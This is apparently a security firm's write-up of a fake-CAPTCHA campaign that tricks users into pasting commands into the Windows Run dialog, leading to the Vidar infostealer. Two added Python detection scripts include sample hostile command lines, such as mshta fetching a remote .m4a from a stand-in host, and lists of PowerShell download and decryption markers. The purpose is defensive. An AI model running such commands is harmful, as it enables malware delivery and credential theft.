"Verification Steps – Press Button Windows+R..."
This simple instruction, appearing on what looked like a legitimate verification screen, launched one of the most common attack chains our security team has encountered this year. Targeting both property and insurance sectors, this attack bypassed traditional security controls through an ingenious social engineering tactic that turned a routine user action into the first step of a complex malware infection.
The Windows+R CAPTCHA Trick
Most of us are familiar with CAPTCHA challenges - those puzzles asking us to identify traffic lights or type distorted text to prove we're human. But what if a website asked you to complete verification steps by using keyboard commands instead?
This is precisely what made this attack so effective. Users visiting malicious websites were presented with a seemingly legitimate verification challenge. However, instead of the typical image-based verification, they were instructed to ‘paste and run’:
- Press Windows+R (opening the Run dialog)
- Paste a malicious script that is copied to the user's clipboard
- Hit Enter to "verify" they were human
This simple yet deceptive technique bypassed security awareness training that typically warns against downloading and opening files. By having users execute commands through the inbuilt Run dialog, attackers created a false sense of security.
The malicious script executed in the Run dialog appeared legitimate, containing what looked like a verification comment, but it was actually downloading and executing malicious files in the background using inbuilt Windows utilities such as PowerShell and mshta.
The Hidden Attack Chain
Once initiated, the attack proceeded through several sophisticated stages:
- The initial command downloaded what appeared to be an audio file (.m4a)
Figure 2 - Screenshot of the Hidden Payload in the m4a file
This image shows the deceptive .m4a file. At first glance, it looks completely harmless. But when opened in a text or code editor, our team uncovered something far more sinister - AES-encrypted PowerShell, cleverly disguised to evade detection and trigger the next stage of the attack.
- This file contained encrypted commands that were automatically decrypted and executed
- Additional malicious components were downloaded and disguised as legitimate files
- The malware operated primarily in memory rather than writing files to disk, making it difficult to detect.
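A triage check for the lookalike audio file described above, added here as an example and not code from the original analysis: a genuine M4A/MP4 file begins with a 4-byte box size followed by the "ftyp" box type, whereas the staged file was plain text containing PowerShell decryption logic. Both sample blobs, the marker list and the threshold are constructed assumptions.

```python
import re

# Constructed samples (not files from the incident). A real M4A starts with
# a box size and the "ftyp" box type; the lookalike is plain-text PowerShell.
GENUINE_M4A = b"\x00\x00\x00\x1cftypM4A \x00\x00\x00\x00M4A mp42isom"
LOOKALIKE_M4A = (b"$k=[Convert]::FromBase64String($x);"
                 b"$a=New-Object System.Security.Cryptography.AesManaged;"
                 b"Invoke-Expression ($d)")

# Tokens with no business in an audio container but typical of PowerShell
# that decrypts and runs a next stage in memory (assumed marker list).
SCRIPT_MARKERS = [
    rb"Invoke-Expression", rb"\bIEX\b", rb"FromBase64String",
    rb"AesManaged|\[System\.Security\.Cryptography\.Aes\]",
    rb"CreateDecryptor", rb"DownloadString|Net\.WebClient",
]

def is_real_mp4_family(data: bytes) -> bool:
    """True if the first box is 'ftyp', as in MP4/M4A/MOV containers."""
    return len(data) >= 12 and data[4:8] == b"ftyp"

def script_markers(data: bytes) -> list[bytes]:
    """Return the marker patterns found in the first 64 KiB of the file."""
    head = data[:65536]
    return [m for m in SCRIPT_MARKERS if re.search(m, head, re.IGNORECASE)]

def triage(filename: str, data: bytes) -> dict:
    """Flag a file whose extension says audio but whose content says script."""
    verdict = {
        "file": filename,
        "ftyp_header": is_real_mp4_family(data),
        "markers": [m.decode() for m in script_markers(data)],
    }
    # Extension/content mismatch plus at least two script markers (assumed threshold).
    verdict["suspicious"] = (filename.lower().endswith((".m4a", ".mp4"))
                             and not verdict["ftyp_header"]
                             and len(verdict["markers"]) >= 2)
    return verdict

if __name__ == "__main__":
    for name, blob in (("song.m4a", GENUINE_M4A), ("verify.m4a", LOOKALIKE_M4A)):
        print(triage(name, blob))
```

The header check is a heuristic for the MP4 family only; a mismatch alone is not proof of malice, which is why the verdict also requires script markers.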
This attack technique demonstrates another evolution in social engineering strategies. Rather than relying on traditional email attachments or suspicious downloads, attackers are increasingly leveraging legitimate system functions and user trust to deliver malware.
Cross-Industry Impact
The malware campaign specifically targeted the property and insurance sectors, exploiting their interconnected supply chains and shared vulnerabilities. This attack highlights how threat actors identify common weaknesses across seemingly unrelated business sectors.
Once established on a system, the malware - identified as a variant of the Vidar information stealer - attempted to harvest sensitive data including:
- Credentials stored in browsers
- Cryptocurrency wallet information
- Financial details
- Business documents
The malware's communication infrastructure was particularly sophisticated, using legitimate online platforms including Telegram channels and Steam community profiles to disguise command and control communications.
Warning Signs and Red Flags
This attack chain highlights several warning signs that organisations should monitor:
- Unusual CAPTCHA verification methods that require system commands
- Unexpected audio file downloads (.m4a) after performing website actions
- System processes spawning unusual child processes
- Outbound connections to Telegram channels or Steam community profiles from business systems
Protecting Your Organisation
Based on our analysis of this attack, we recommend implementing the following security measures:
- Enhanced User Awareness Training
Update security awareness training to include these newer, non-traditional phishing techniques. Ensure users understand that legitimate websites will never ask them to:
- Open command prompts or Run dialogs
- Copy and paste commands as part of verification processes
- Download files as part of a CAPTCHA verification
- Technical Controls
- Enable device hardening strategies such as Microsoft’s Attack Surface Reduction (ASR) rules, which would have blocked key components of this attack chain
- Implement application control policies that prevent script execution from unexpected file types
- Deploy memory-scanning capabilities to detect fileless malware techniques
- Security Monitoring
- Monitor for unexpected network connections to file-sharing services and social media platforms
- Implement behavioural analysis tools that can identify unusual process relationships
- Deploy advanced endpoint detection with memory scanning capabilities
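An added example of the "unusual child process" and "unusual process relationships" signals from the Warning Signs and Security Monitoring sections, not code from the original post: commands entered in the Run dialog are launched by explorer.exe, so a script host (mshta or PowerShell) spawned directly by explorer.exe with a remote URL and an audio extension on its command line matches this chain. The field names ParentImage, Image and CommandLine are Sysmon process-creation fields; the pipe-delimited record format, the sample events and the scoring thresholds are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon-style process-creation records (not logs from the incident).
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta https://verify.example.invalid/captcha/track.m4a",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Mozilla Firefox\firefox.exe|CommandLine=firefox.exe",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -File C:\Scripts\backup.ps1",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -c Invoke-WebRequest https://updates.example.invalid/agent.msi",
]

RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.IGNORECASE)
SCRIPT_HOSTS = re.compile(r"\\(mshta|powershell|pwsh)\.exe$", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
MEDIA_LURE = re.compile(r"\.(m4a|mp4|mp3|wav)\b", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def parse_event(line: str) -> ProcEvent:
    """Parse a 'Key=value|Key=value' record into a ProcEvent."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])

def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return a risk score (one point per signal) and the matching reasons."""
    reasons = []
    if RUN_DIALOG_PARENT.search(ev.parent_image) and SCRIPT_HOSTS.search(ev.image):
        reasons.append("script host spawned directly by explorer.exe (Run dialog)")
    if REMOTE_URL.search(ev.command_line):
        reasons.append("remote URL on the command line")
    if MEDIA_LURE.search(ev.command_line):
        reasons.append("audio/video extension passed to a script host")
    return len(reasons), reasons

def find_alerts(lines, threshold: int = 2) -> list[tuple[str, int, list[str]]]:
    """Events scoring at or above the threshold (assumed: 2 = review, 3 = high)."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev.image, score, reasons))
    return alerts

if __name__ == "__main__":
    for image, score, reasons in find_alerts(SAMPLE_EVENTS):
        print(score, image, "; ".join(reasons))
```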
Staying Ahead of Evolving Attack Techniques
This attack demonstrates how threat actors continue to innovate, blending social engineering with technical sophistication to bypass security controls. By exploiting the human tendency to follow instructions from seemingly legitimate websites, attackers found a way to execute malicious code through trusted system features.
The incident emphasises the importance of having a robust Microsoft Defender service in place, with all Attack Surface Reduction (ASR) rules properly enabled. These controls, when correctly configured, can block critical components of fileless malware attacks even when traditional detection methods fail.
For organisations concerned about similar threats, our SOC team offers several options to enhance your security posture:
We continue to monitor for new variants of this attack technique and provide detailed threat intelligence to our managed security clients.
Our technical team has prepared a detailed analysis of this malware, including reverse engineering insights, code analysis and indicators of compromise. If you’d like to be notified when this content becomes available, subscribe to our threat intelligence updates.